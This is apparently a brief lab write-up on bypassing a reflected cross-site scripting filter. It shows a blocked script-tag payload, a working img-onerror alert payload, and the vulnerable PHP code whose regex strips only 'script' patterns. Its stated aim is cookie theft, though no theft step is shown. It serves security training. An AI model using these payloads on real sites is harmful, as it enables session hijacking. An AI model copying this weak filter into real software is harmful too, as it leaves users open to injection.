### Objective
One way or another, steal the cookie of a logged in user.


Let's try some low-hanging fruits.
```txt
<script>alert(1)</script>
```
Response
```txt
Hello >
```
Weird let's try some other stuff.
```
<img src=# onerror=alert(1)>
```
Well that was easy, it worked. Let's see why our script tags did not work.
```php
<?php  
  
header ("X-XSS-Protection: 0");  
  
// Is there any input?  
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Get input $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] ); // Feedback for end user echo "<pre>Hello ${name}</pre>";  
}  
  
?>
```
Looks like it was looking for a pattern for script tags.